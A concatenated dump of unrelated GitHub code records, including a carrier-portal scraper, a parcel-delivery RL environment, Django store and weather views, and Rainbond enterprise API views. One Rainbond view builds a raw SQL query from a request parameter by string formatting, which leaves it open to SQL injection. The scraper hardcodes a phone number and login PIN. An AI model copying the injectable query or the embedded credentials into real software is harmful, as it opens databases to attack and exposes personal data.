im[j,i-n]\n r = im[j,i+n]\n px = (float(l)+float(r))/2.0\n imout[j,i] = px\n return imout\n\ndef acuity_transform2d(img, acuity_src, acuity_dst):\n c = float(acuity_src)/float(acuity_dst)\n if c < 0.0:\n # acuity is actually higher for dst and we can't increase \"resolution\"\n return img\n factor = int(c/2)\n factor = min(factor, 20)\n\n chans = cv2.split(img)\n cl = len(chans)\n for c in range(cl):\n for i in range(1,factor+1):\n chans[c] = window_1d(chans[c], i) # horizontal pass\n chans[c] = window_1d(chans[c].T, i).T # vertical pass\n\n\n out = cv2.merge(chans)\n\n return 
out\n\n","repo_name":"readicculus/animaloptics","sub_path":"simulator/translations.py","file_name":"translations.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"75179966213","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport logging\nfrom selenium.webdriver.firefox.options import Options as FirefoxOptions\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom dateutil import parser\nimport sqlite3\nfrom datetime import datetime\n\nas_of = \"\"\ndata_remaining = \"\"\nmobile_number = \"9760854852\"\n\n\n\ndef getDataUsage():\n\n options = FirefoxOptions()\n # driver = webdriver.Firefox()\n # options.binary_location = '/usr/local/bin/geckodriver'\n # options.add_argument(\"--headless\")\n options.headless = True\n driver = webdriver.Firefox(options=options)\n\n driver.get(\"https://www.gomo.ph/sign-in.html\")\n\n # check if the webpage is in maintenance mode\n try:\n if driver.find_element_by_class_name(\"dawn-error-page__title\").text == \"We'll be back soon!\":\n # under maintenance\n print(\"under maintenance! please come back again later\")\n exit()\n except:\n print(\"Maintenance page not found, system is working as expected!\")\n\n elem = driver.find_element_by_name(\"regiterNumber\")\n elem.send_keys(mobile_number)\n elem.send_keys(Keys.RETURN)\n\n driver.implicitly_wait(10) # seconds\n\n # pin \n elemPin1 = driver.find_element_by_name(\"input-1\")\n elemPin1.send_keys(\"0\")\n elemPin2 = driver.find_element_by_name(\"input-2\")\n elemPin2.send_keys(\"0\")\n elemPin3 = driver.find_element_by_name(\"input-3\")\n elemPin3.send_keys(\"0\")\n elemPin4 = driver.find_element_by_name(\"input-4\")\n elemPin4.send_keys(\"0\")\n elemPin5 = driver.find_element_by_name(\"input-5\")\n elemPin5.send_keys(\"0\")\n elemPin6 = driver.find_element_by_name(\"input-6\")\n elemPin6.send_keys(\"0\")\n\n # get the remaining data from the dashboard\n driver.implicitly_wait(10) # seconds\n elemDataRemaining = driver.find_element_by_class_name(\"data-usage__item-content-title\").text\n elemDataRemainingAsOf = driver.find_element_by_class_name(\"data-usage__item-content-desc\").text\n \n print(elemDataRemaining + \" as of \" + elemDataRemainingAsOf)\n # file1 = open(\"usage.txt\",\"w\")\n # file1.write(elemDataRemaining + \" \" + elemDataRemainingAsOf)\n # file1.close()\n\n print(\"data:\" + elemDataRemaining)\n print(\"date:\" + elemDataRemainingAsOf)\n \n\n striped_date = elemDataRemainingAsOf.strip(\"as of \")\n striped_date = striped_date.replace(\",\",\"\")\n \n # print(\"formatted date:\" + striped_date)\n \n dt = parser.parse(striped_date)\n\n global data_remaining\n global as_of\n as_of = str(dt.date())\n data_remaining = str(elemDataRemaining)\n\n print(as_of)\n\n driver.quit()\n\ndef setup():\n\n con = sqlite3.connect('datamonitor.db')\n cur = con.cursor()\n # Create table\n sql_create_projects_table = \"\"\" CREATE TABLE IF NOT EXISTS data_usage (\n mobile_number text NOT NULL,\n date text NOT NULL,\n remaining_data text\n ); \"\"\"\n\n cur.execute(sql_create_projects_table)\n\n # Save (commit) the changes\n con.commit()\n\n con.close()\n\ndef saveToDatabase():\n\n con = sqlite3.connect('datamonitor.db')\n cur = con.cursor()\n\n # Insert a row of data\n cur.execute(\"INSERT INTO data_usage (mobile_number,date,remaining_data) VALUES (?,?,?)\",(mobile_number, as_of, data_remaining))\n\n # Save (commit) the changes\n con.commit()\n\n # We can 
also close the connection if we are done with it.\n # Just be sure any changes have been committed or they will be lost.\n con.close()\n\ndef main():\n logging.debug('Running data monitor ...')\n print('Running data monitor ...')\n setup()\n getDataUsage()\n saveToDatabase()\n\nif __name__ == \"__main__\":\n main()","repo_name":"fagray/gomo-bandwidth-monitor","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32705357283","text":"from __future__ import print_function\n\nimport numpy as np\nimport numpy.ma as ma\nfrom Src.Utils.Utils import get_dist_mat_HGS,get_fleet\nfrom Environments.OOH.containers import Location,ParcelPoint,ParcelPoints,Vehicle,Fleet,Customer\nfrom Environments.OOH.env_utils import utils_env\nfrom Environments.OOH.customerchoice import customerchoicemodel\n\nclass Parcelpoint_py(object):\n def __init__(self,\n model,\n max_steps_r,\n max_steps_p,\n pricing = False,\n n_vehicles=2,\n veh_capacity=100,\n parcelpoint_capacity=25,\n incentive_sens=0.99,\n base_util=0.2,\n home_util=0.3,\n reopt=2000,\n load_data=False,\n coords=[],\n dist_matrix=[],\n n_parcelpoints=6,\n adjacency=[],\n service_times=[],\n dissatisfaction=False,\n hgs_time=3.0):\n \n #episode length params\n self.max_steps = 0\n self.max_steps_r = max_steps_r\n self.max_steps_p = max_steps_p\n \n #init fleet and parcelpoints\n self.n_vehicles = n_vehicles\n self.veh_capacity = veh_capacity\n self.pp_capacity = parcelpoint_capacity\n self.data = dict()\n \n #possible passed on data\n self.coords = coords\n self.dist_matrix = dist_matrix\n self.n_parcelpoints = n_parcelpoints\n self.adjacency = adjacency\n self.service_times = service_times\n \n #load data or generate data\n self.load_data = load_data\n self.n_unique_customer_locs = len(self.coords)-self.n_parcelpoints\n if self.load_data:\n print(\"\\n Note: the HGS python implementation (hygese 0.0.0.8) throws an assertion error for coords<0, you will need to outcomment this check in hygese.py \\n\")\n self.utils = utils_env(Location,Vehicle,Fleet,ParcelPoint,ParcelPoints,self.veh_capacity,self.n_vehicles,self.pp_capacity,self.data,self.dist_matrix,hgs_time)\n self.depot = self.coords[0]\n self.parcelPoints = self.utils.get_parcelpoints_from_data(self.coords[-self.n_parcelpoints:],self.n_unique_customer_locs)\n self.get_customer = self.get_new_customer_from_data\n self.num_cust_loc = len(self.dist_matrix)-len(self.parcelPoints[\"parcelpoints\"])-1\n self.dist_scaler = np.amax(self.dist_matrix)\n else:\n self.depot = Location(50,50,0,0)\n self.utils = utils_env(Location,Vehicle,Fleet,ParcelPoint,ParcelPoints,self.veh_capacity,self.n_vehicles,self.pp_capacity,self.data,self.dist_matrix,hgs_time)\n self.parcelPoints = self.utils.get_parcelpoints()\n self.get_customer = self.generate_new_customer\n self.dist_scaler = 10\n \n #customers\n self.home_util = home_util\n self.incentive_sens = incentive_sens\n self.dissatisfaction = dissatisfaction\n \n self.newCustomer = Customer\n self.fleet = get_fleet([self.depot,self.depot],self.n_vehicles,self.veh_capacity)\n\n #pricing of offering problem variant\n if pricing:\n #self.action_space_matrix = self.get_actions(pricing,self.n_parcelpoints)\n self.customerchoice = customerchoicemodel(base_util,self.dist_scaler,self.utils.getdistance_euclidean,self.dist_matrix,self.n_unique_customer_locs)\n self.customerChoice = self.customerchoice.customerchoice_pricing\n 
self.get_delivery_loc = self.get_delivery_loc_pricing\n else:\n #self.action_space_matrix = self.get_actions(pricing,self.n_parcelpoints)\n self.customerchoice = customerchoicemodel(base_util,self.dist_scaler,self.utils.getdistance_euclidean,self.dist_matrix,self.n_unique_customer_locs)\n self.customerChoice = self.customerchoice.customerchoice_offer\n self.get_delivery_loc = self.get_delivery_loc_offer\n \n self.steps = 0\n # self.max_steps = (self.n_vehicles*self.veh_capacity)\n self.reopt_freq = reopt\n \n self.reset()\n\n def seed(self, seed):\n self.seed = seed\n\n def reset(self,training=True):\n \"\"\"\n Sets the environment to default conditions\n \"\"\"\n self.max_steps = np.random.negative_binomial(self.max_steps_r,self.max_steps_p)\n \n self.fleet = self.utils.reset_fleet(self.fleet,[self.depot,self.depot])\n self.parcelPoints = self.utils.reset_parcelpoints(self.parcelPoints)\n \n self.steps = 0\n self.service_time = 0\n self.count_home_delivery = 0\n self.total_prices = []\n self.total_discounts = []\n \n self.data['x_coordinates'] = self.depot.x\n self.data['y_coordinates'] = self.depot.y\n self.data['id'] = 0\n self.data['time'] = 0\n self.data['vehicle_capacity'] = self.veh_capacity\n self.data['num_vehicles'] = self.n_vehicles\n \n self.count_dissatisfaction = 0\n \n self.curr_state = self.make_state()\n return self.curr_state\n\n def get_new_customer_from_data(self):\n idx = np.random.randint(1, self.num_cust_loc)\n home = self.coords[idx]#depot = 0\n home.time=self.steps\n service_time = self.service_times[idx]\n return Customer(home,self.incentive_sens,self.home_util,service_time,idx)\n\n def generate_new_customer(self):\n idx = np.random.randint(0, 100*100)\n home = self.coords[idx]#depot = 0\n home.time=self.steps\n service_time = self.service_times[idx]\n return Customer(home,self.incentive_sens,self.home_util,service_time,idx)\n\n def make_state(self):\n self.newCustomer = self.get_customer()\n state = [self.newCustomer,self.fleet,self.parcelPoints,self.steps]\n return state\n \n def abstract_state_ppo(self,state):\n newcust_x = state[0].home.x\n newcust_y = state[0].home.y\n \n #for user friendliness, we commented out the state route variables\n # closest_locations = []\n # for v in range(self.n_vehicles):\n # for loc in sorted(state[1][v][\"routePlan\"], key=distance_to_home)[:20]:\n # closest_locations.append(loc)\n \n return [newcust_x,newcust_y]\n \n def is_terminal(self):\n if self.steps > self.max_steps:\n return 1\n else:\n return 0\n \n def get_delivery_loc_pricing(self,action):\n mask = ma.masked_array(self.parcelPoints[\"parcelpoints\"], mask=self.adjacency[self.newCustomer.id_num])#only offer 20 closest\n return self.customerChoice(self.newCustomer,action,mask)\n \n def get_delivery_loc_offer(self,action):\n #get the chosen delivery location\n return self.customerChoice(self.newCustomer,action,self.parcelPoints[\"parcelpoints\"])\n \n def reopt_for_eval(self,data):\n if self.load_data:\n data[\"distance_matrix\"] = get_dist_mat_HGS(self.dist_matrix,data['id'])\n _,cost = self.utils.reopt_HGS(data)\n return cost\n \n #ToDo: cleanup saving statistics, not efficient right now\n def step(self,action):\n self.steps += 1\n \n #get the customer's choice of delivery location\n loc,accepted_pp,idx,price = self.get_delivery_loc(action)\n if price>0:\n self.total_prices.append(price)\n else:\n self.total_discounts.append(price)\n self.data['x_coordinates']= np.append(self.data['x_coordinates'],loc.x)\n self.data['y_coordinates'] = 
np.append(self.data['y_coordinates'],loc.y)\n self.data['id'] = np.append(self.data['id'],loc.id_num)\n self.data['time'] = np.append(self.data['time'],self.steps)\n \n #reduce parcelpoint capacity, if chosen\n if accepted_pp:\n self.parcelPoints[\"parcelpoints\"][idx-self.n_unique_customer_locs].remainingCapacity -= 1\n self.service_time+=0\n else:#home delivery\n self.service_time+=self.service_times[idx]\n self.count_home_delivery+=1\n \n if self.dissatisfaction:#perhaps remove, not used so far\n if np.mean(action)>2.75 and np.std(action)<1.0:\n self.count_dissatisfaction+=1\n \n #construct intermittent route kept in memory during booking horizon\n insertVeh,idx,costs = self.utils.cheapestInsertionRoute(loc,self.fleet)\n self.fleet[\"fleet\"][insertVeh][\"routePlan\"].insert(idx,loc)\n \n #re-optimize the intermeittent route after X steps, we did not do this for the paper\n if self.steps % self.reopt_freq == 0:#do re-opt using HGS\n if self.load_data:\n self.data[\"distance_matrix\"] = get_dist_mat_HGS(self.dist_matrix,self.data['id'])\n self.fleet,_ = self.utils.reopt_HGS(self.data)\n \n #info for plots and statistics\n stats = self.steps,self.count_home_delivery,self.service_time,self.total_prices,self.parcelPoints[\"parcelpoints\"],self.dist_matrix[self.newCustomer.home.id_num][loc.id_num],self.total_discounts,price\n \n #generate new customer arrival and return state info\n self.curr_state = self.make_state()\n \n return self.curr_state.copy(), self.is_terminal(), stats, self.data","repo_name":"frakkerman/ooh_code","sub_path":"Environments/OOH/Parcelpoint_py.py","file_name":"Parcelpoint_py.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"14895644783","text":"import xlwt\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport re\nfrom time import sleep\ndcap = dict(DesiredCapabilities.PHANTOMJS)\nbook = xlwt.Workbook(encoding='utf-8', style_compression=0)\nsheet=book.add_sheet('sell')\ndcap[\"phantomjs.page.settings.userAgent\"] = (\n\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0\")\ndriver=webdriver.PhantomJS(r'C:\\Users\\战神皮皮迪\\Downloads\\phantomjs-2.1.1-windows\\bin\\phantomjs.exe')\nurl=input(\"输入你需要爬取的网址:\")\nendpage=input(\"输入向后爬取的数量:\")\nCurrentPage=re.findall(\"&s=(\\d+)\",url)\nCurrentPage=int(''.join(CurrentPage))\n#https://shopsearch.taobao.com/search?app=shopsearch&q=%E6%B5%B4&imgfile=&commend=all&ssid=s5-e&search_type=shop&sourceId=tb.index&spm=a21bo.1000386.201856-taobao-item.1&ie=utf8&initiative_id=tbindexz_20170306&isb=0&shop_type=&ratesum=&qq-pf-to=pcqq.c2c&sort=sale-desc&s=40\ndef get_content(i):\n driver.get(url.replace(\"&s=\"+str(CurrentPage),'&s=')+str(i))\n content=driver.page_source\n if len(driver.page_source)<500:\n sleep(1) #在这里改时间间隔\n get_content(i)\n else:\n nick=re.findall('\"nick\":\"(.*?)\",\"provcity',content)\n write_to_excel(i,nick)\ndef write_to_excel(star,data):\n # print(star ,' ',star+len(data))\n excel_start=star-CurrentPage\n excel_end=star+len(data)-CurrentPage\n for i in range(excel_start,excel_end):\n if i<20:\n sheet.write(i,0,data[i])\n print(data[i] + \"写入execl成功!\")\n else:\n List_Down=i-excel_start\n sheet.write(i,0,data[List_Down])\n print(data[List_Down]+ \"写入execl成功!\")\n\n\nfor i in range(CurrentPage,CurrentPage+int(endpage)*20+1,20):\n get_content(i)\n 
book.save(\"test1.xls\")","repo_name":"xiantang/Spider","sub_path":"TaoBaoShop/sell.py","file_name":"sell.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"44"} +{"seq_id":"37943252746","text":"import tkinter as tk\nimport Constants as consts\n\nclass UserInterface:\n def __init__(self,deck,validator,controller):\n self.validator = validator\n self.controller = controller\n self.deck = deck\n self.window = tk.Tk()\n self.deskCardImages = []\n self.buttonList = []\n\n #public function, used to start the gameUI\n def drawMain(self):\n self.initWindow()\n self.setMenuBar(self.window)\n topFrame,bodyFrame,bottomFrame = self.initWindowFrame(self.window)\n topFrame.pack()\n bodyFrame.pack()\n bottomFrame.pack()\n self.setGameBody(bodyFrame)\n self.setControlButton(bottomFrame)\n self.window.mainloop()\n \n #initialize rootwindow basic attribute, length height and titile\n def initWindow(self):\n length = consts.WINDOW_WIDTH\n height = consts.WINDOW_HEIGHT\n self.window.title(consts.GAME_NAME)\n self.window.geometry(\"%dx%d\" % (length,height))\n\n #set up window outline(divide it into frames)\n def initWindowFrame(self,window):\n return [tk.Frame(window),tk.Frame(window),tk.Frame(window)]\n\n #Set up----------------------------------Menubar start from here----------------------------------------------\n def setMenuBar(self,window):\n menubar = tk.Menu(window)\n self.setOptionMenu(menubar)\n self.setDifficultyMenu(menubar)\n window.config(menu=menubar)\n\n def setOptionMenu(self,menubar):\n optionMenu = tk.Menu(menubar,tearoff=0)\n menubar.add_cascade(label='Option',menu=optionMenu)\n optionMenu.add_command(label=\"Window size +\",command=self.controller.enlargeWindow(self.window))\n optionMenu.add_command(label=\"Window size -\",command=self.controller.reduceWindow(self.window))\n optionMenu.add_separator()\n optionMenu.add_command(label='Exit',command=self.window.quit)\n \n def setDifficultyMenu(self,menubar):\n difficultyMenu = tk.Menu(menubar,tearoff=0)\n menubar.add_cascade(label='Difficulty',menu=difficultyMenu)\n difficultyMenu.add_command(label=\"easy\",command=self.controller.changeGameDifficulty(consts.EASY,self.deck))\n difficultyMenu.add_command(label=\"middle\",command=self.controller.changeGameDifficulty(consts.MIDDLE,self.deck))\n difficultyMenu.add_command(label=\"hard\",command=self.controller.changeGameDifficulty(consts.HARD,self.deck))\n #-------------------------------------MenuBar End here-----------------------------------------------------\n\n\n #-------------------------------------bodyFrame start here------------------------------------------------\n def setGameBody(self,bodyFrame): \n self.controller.loadCardsImage(self.deck.deskCards,self.deskCardImages)\n self.showDesk(bodyFrame)\n # canvas.create_image(0,0, anchor='nw', image=img)\n # canvas.pack()\n\n def showDesk(self,bodyFrame):\n index = 0\n buttonList = []\n for i in range(0,consts.DESK_CARDS_ONECOL):\n rowList = []\n for j in range(0,consts.DESK_CARDS_ONEROW):\n button = tk.Button(bodyFrame,\n image = self.deskCardImages[index],\n command = lambda: self.controller.chooseCard(i,j,self.deck,button) )\n button.grid(row = i,column=j)\n rowList.append(button)\n index+=1\n buttonList.append(rowList)\n\n #-------------------------------------bodyFrame End here--------------------------------------------------\n\n\n def setControlButton(self,frameBottom):\n pass\n #set up submitted button\n\n #set up 
memu","repo_name":"muyizhu/SetGame","sub_path":"UserInterface.py","file_name":"UserInterface.py","file_ext":"py","file_size_in_byte":3664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42436690617","text":"print ('Lambda Function')\n\n\nval1 = int(input('enter value 1 :'))\nval2 = int(input('enter value 2 :'))\n\nadd = lambda a ,b : a + b\nsub = lambda a, b : a - b\nmul = lambda a, b : a * b\ndiv = lambda a, b : a / b\nmod = lambda a, b : a % b\nsquare = lambda a : a * a\ncube = lambda a : a * a * a\n\nresult_add = add(val1, val2)\nprint(result_add)\nresult_sub = sub(val1, val2)\nprint(result_sub)\nresult_mul = mul(val1, val2)\nprint(result_mul)\nresult_div = div(val1, val2)\nprint(result_div)\nresult_mod = mod(val1, val2)\nprint(result_mod)\nresult_square = square(val1)\nprint(result_square)\nresult_cube = cube(val1)\nprint(result_cube)","repo_name":"DharmilShahJBSPL/DharmilShah","sub_path":"python/lamda_anonymous_function/lambda_anonymous_function.py","file_name":"lambda_anonymous_function.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40581168794","text":"import requests\nfrom .models import UserProfile \n\ndef get_weather_data(location_name, user, forecast_type='current'):\n try:\n user_profile = UserProfile.objects.get(user=user)\n api_key = user_profile.accuweather_api_key\n\n\n params = {\n 'q': location_name,\n 'apikey': api_key,\n }\n\n location_search_endpoint = 'http://dataservice.accuweather.com/locations/v1/cities/search'\n response = requests.get(location_search_endpoint, params=params)\n location_data = response.json()\n \n if location_data:\n location_key = location_data[0]['Key']\n\n if forecast_type == 'current':\n forecast_endpoint = f'http://dataservice.accuweather.com/currentconditions/v1/{location_key}'\n elif forecast_type == 'daily':\n forecast_endpoint = f'http://dataservice.accuweather.com/forecasts/v1/daily/1day/{location_key}'\n else:\n return None\n\n forecast_response = requests.get(forecast_endpoint, params=params)\n forecast_data = forecast_response.json()\n return forecast_data\n else:\n return None\n except UserProfile.DoesNotExist:\n return None\n","repo_name":"mohan-cyber/weather-application","sub_path":"weatherapp/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40598952471","text":"from nis import cat\nfrom threading import get_ident\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom django.contrib import messages\nfrom .models import Product,ReviewRating\nfrom .forms import RatingsForm\nfrom Orders.models import OrderProduct\nfrom Category.models import Category\nfrom Cart.models import CartItem\nfrom Cart.views import _get_session_id\nfrom django.core.paginator import PageNotAnInteger,EmptyPage,Paginator\nfrom django.db.models import Q\n\n\n# Create your views here.\ndef store(request,category_slug=None):\n if category_slug:\n categories=get_object_or_404(Category,slug=category_slug)\n products=Product.objects.all().filter(category=categories,is_available=True).order_by('id')\n paginator=Paginator(products,1)\n page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n else:\n products=Product.objects.all().filter(is_available=True).order_by('id')\n paginator=Paginator(products,6)\n 
page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n context={\n 'page_num':page_num,\n 'page':paged_products,\n 'products_count':products.count()\n }\n return render(request,'store/store.html',context)\n\ndef product_detail(request,category_slug=None,product_slug=None):\n try:\n product=Product.objects.get(category__slug=category_slug,slug=product_slug)\n in_cart=CartItem.objects.filter(cart__cart_id=_get_session_id(request),product=product).exists()\n except Exception as e:\n return e\n try:\n bought_product=OrderProduct.objects.filter(user_id=request.user.id,product_id=product.id).exists()\n except OrderProduct.DoesNotExist:\n bought_product=None\n try:\n product_reviews=ReviewRating.objects.filter(product_id=product.id,status=True)\n except ReviewRating.DoesNotExist:\n product_reviews=None\n context={\n 'product':product,\n 'in_cart':in_cart,\n 'has_bought_product':bought_product,\n 'product_reviews':product_reviews\n }\n return render(request,'store/product_detail.html',context)\n\ndef search(request):\n if 'keyword' in request.GET:\n keyword=request.GET['keyword']\n if keyword:\n products=Product.objects.order_by('created_date').filter(Q(description__icontains=keyword) | Q(product_name__icontains=keyword))\n paginator=Paginator(products,8)\n page_num=request.GET.get('page')\n paged_products=paginator.get_page(page_num)\n else:\n return redirect('store')\n context={\n 'page_num':page_num,\n 'page':paged_products,\n 'products_count':products.count(),\n 'search_keyword':keyword\n }\n return render(request,'store/store.html',context)\n\ndef reviews(request,product_id):\n url=request.META.get('HTTP_REFERER')\n if request.method=='POST':\n try:\n reviews_=ReviewRating.objects.get(user_id=request.user.id,product_id=product_id)\n form=RatingsForm(request.POST,instance=reviews_)\n form.save()\n messages.success(request,'Thank you. Your review has been updated successfully!')\n return redirect(url)\n except ReviewRating.DoesNotExist:\n form=RatingsForm(request.POST)\n if form.is_valid():\n rating=ReviewRating()\n rating.user_id=request.user.id\n rating.product_id=product_id\n rating.subject=form.cleaned_data['subject']\n rating.review=form.cleaned_data['review']\n rating.rating=form.cleaned_data['rating']\n rating.ip=request.META.get('REMOTE_ADDR')\n rating.save()\n messages.success(request,'Thank you! Your review has been received. 
If you have any concerns please contact our support center')\n return redirect(url)\n return redirect(url)","repo_name":"GAndanje/EcommerceStore","sub_path":"Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41311278097","text":"# -*- coding: utf-8 -*-\n# creater by: barnett\nimport logging\n\nfrom django.db import connection\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom rest_framework import status\nfrom rest_framework.response import Response\n\nfrom console.exception.main import ServiceHandleException\nfrom console.models.main import EnterpriseUserPerm\nfrom console.repositories.user_repo import user_repo\nfrom console.services.enterprise_services import enterprise_services\nfrom console.services.region_services import region_services\nfrom console.utils.timeutil import time_to_str\nfrom openapi.serializer.ent_serializers import EnterpriseInfoSerializer\nfrom openapi.v2.serializer.ent_serializers import (EnterpriseSourceSerializer, ListEntsRespSerializer, UpdEntReqSerializer)\nfrom openapi.v2.views.base import BaseOpenAPIView, ListAPIView\nfrom www.apiclient.regionapi import RegionInvokeApi\n\nlogger = logging.getLogger(\"default\")\nregion_api = RegionInvokeApi()\n\n\nclass ListEnterpriseInfoView(ListAPIView):\n @swagger_auto_schema(\n operation_description=\"获取企业列表\",\n manual_parameters=[\n openapi.Parameter(\"query\", openapi.IN_QUERY, description=\"按企业名称, 企业别名搜索\", type=openapi.TYPE_STRING),\n openapi.Parameter(\"current\", openapi.IN_QUERY, description=\"页码\", type=openapi.TYPE_STRING),\n openapi.Parameter(\"pageSize\", openapi.IN_QUERY, description=\"每页数量\", type=openapi.TYPE_STRING),\n ],\n responses={status.HTTP_200_OK: ListEntsRespSerializer()},\n tags=['openapi-entreprise'],\n )\n def get(self, req):\n try:\n page = int(req.GET.get(\"current\", 1))\n except ValueError:\n page = 1\n try:\n page_size = int(req.GET.get(\"pageSize\", 10))\n except ValueError:\n page_size = 10\n query = req.GET.get(\"query\", \"\")\n ents, total = enterprise_services.list_all(query, page, page_size)\n serializer = ListEntsRespSerializer({\"data\": ents, \"total\": total})\n return Response(serializer.data, status.HTTP_200_OK)\n\n\nclass EnterpriseInfoView(BaseOpenAPIView):\n @swagger_auto_schema(\n operation_description=\"更新企业信息\",\n query_serializer=UpdEntReqSerializer,\n responses={},\n tags=['openapi-entreprise'],\n )\n def put(self, req, eid):\n enterprise_services.update(eid, req.data)\n return Response(None, status=status.HTTP_200_OK)\n\n @swagger_auto_schema(\n operation_description=\"获取企业信息\",\n responses={200: EnterpriseInfoSerializer},\n tags=['openapi-entreprise'],\n )\n def get(self, req, eid):\n ent = enterprise_services.get_enterprise_by_id(eid)\n if ent is None:\n return Response({\"msg\": \"企业不存在\"}, status=status.HTTP_404_NOT_FOUND)\n serializer = EnterpriseInfoSerializer(data=ent.to_dict())\n serializer.is_valid(raise_exception=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass EnterpriseSourceView(ListAPIView):\n @swagger_auto_schema(\n operation_description=\"获取企业使用资源信息\",\n responses={200: EnterpriseSourceSerializer},\n tags=['openapi-entreprise'],\n )\n def get(self, req, eid):\n data = {\"enterprise_id\": eid, \"used_cpu\": 0, \"used_memory\": 0, \"used_disk\": 0}\n if not req.user.is_administrator:\n raise ServiceHandleException(status_code=401, error_code=401, 
msg=\"Permission denied\")\n ent = enterprise_services.get_enterprise_by_id(eid)\n if ent is None:\n return Response({\"msg\": \"企业不存在\"}, status=status.HTTP_404_NOT_FOUND)\n regions = region_services.get_regions_by_enterprise_id(eid)\n for region in regions:\n try:\n # Exclude development clusters\n if \"development\" in region.region_type:\n logger.debug(\"{0} region type is development in enterprise {1}\".format(region.region_name, eid))\n continue\n res, body = region_api.get_region_resources(eid, region=region.region_name)\n rst = body.get(\"bean\")\n if res.get(\"status\") == 200 and rst:\n data[\"used_cpu\"] += rst.get(\"req_cpu\", 0)\n data[\"used_memory\"] += rst.get(\"req_mem\", 0)\n data[\"used_disk\"] += rst.get(\"req_disk\", 0)\n except ServiceHandleException:\n continue\n\n serializer = EnterpriseSourceSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\nclass EntUserInfoView(BaseOpenAPIView):\n def get(self, request, *args, **kwargs):\n page = int(request.GET.get(\"page_num\", 1))\n page_size = int(request.GET.get(\"page_size\", 10))\n enterprise_id = request.GET.get(\"eid\", None)\n\n admins_num = EnterpriseUserPerm.objects.filter(enterprise_id=enterprise_id).count()\n admin_list = []\n start = (page - 1) * 10\n remaining_num = admins_num - (page - 1) * 10\n end = 10\n if remaining_num < page_size:\n end = remaining_num\n\n cursor = connection.cursor()\n cursor.execute(\n \"select user_id from enterprise_user_perm where enterprise_id='{0}' order by user_id desc LIMIT {1},{2};\".format(\n enterprise_id, start, end))\n admin_tuples = cursor.fetchall()\n for admin in admin_tuples:\n user = user_repo.get_by_user_id(user_id=admin[0])\n bean = dict()\n if user:\n bean[\"nick_name\"] = user.nick_name\n bean[\"phone\"] = user.phone\n bean[\"email\"] = user.email\n bean[\"create_time\"] = time_to_str(user.create_time, \"%Y-%m-%d %H:%M:%S\")\n bean[\"user_id\"] = user.user_id\n admin_list.append(bean)\n\n result = {\"list\": admin_list, \"total\": admins_num}\n return Response(result, status.HTTP_200_OK)\n","repo_name":"goodrain/rainbond-console","sub_path":"openapi/v2/views/enterprise_view.py","file_name":"enterprise_view.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"45"} +{"seq_id":"73006552135","text":"import os\nimport pandas as pd\nimport shutil\nimport datetime\nfrom pywebhdfs.webhdfs import PyWebHdfsClient\nfrom hdfs import InsecureClient\n\ncurrent = datetime.datetime.now()\n\nclient_hdfs = InsecureClient('http://namenode:9870')\npath = 'mimic-iii-waveform'\nhdfs = PyWebHdfsClient(host='namenode',port='9870')\ndata = hdfs.list_dir('user/root/' + path)\n\nfile_statuses = data[\"FileStatuses\"]\n\nfor item in file_statuses[\"FileStatus\"]:\n\tsubdata = hdfs.list_dir('user/root/' + path + '/' + str(item['pathSuffix']))\n\tfile_statuses2 = subdata[\"FileStatuses\"]\n\tfor item2 in file_statuses2[\"FileStatus\"]:\n\t\tfile = str(item2['pathSuffix'])\n\t\tpath_file = path + '/' + str(item['pathSuffix']) + '/' + file\n\t\tif file.endswith('hea.txt'):\n\t\t\twith client_hdfs.read(path_file, encoding = 'utf-8') as reader:\n\t\t\t\tdf = pd.read_csv(reader, sep = ';')\n\t\t\t\t#Per i file segnale bisogna unire la riga delle unita misura alla riga di intestazione\n\t\t\t\tmeasure_units = df.iloc[[0]].to_records(index = False) #unit di misura\n\t\t\t\tdf = df.replace('\"', '')\n\t\t\t\tdf = df.drop(labels = 0, axis = 
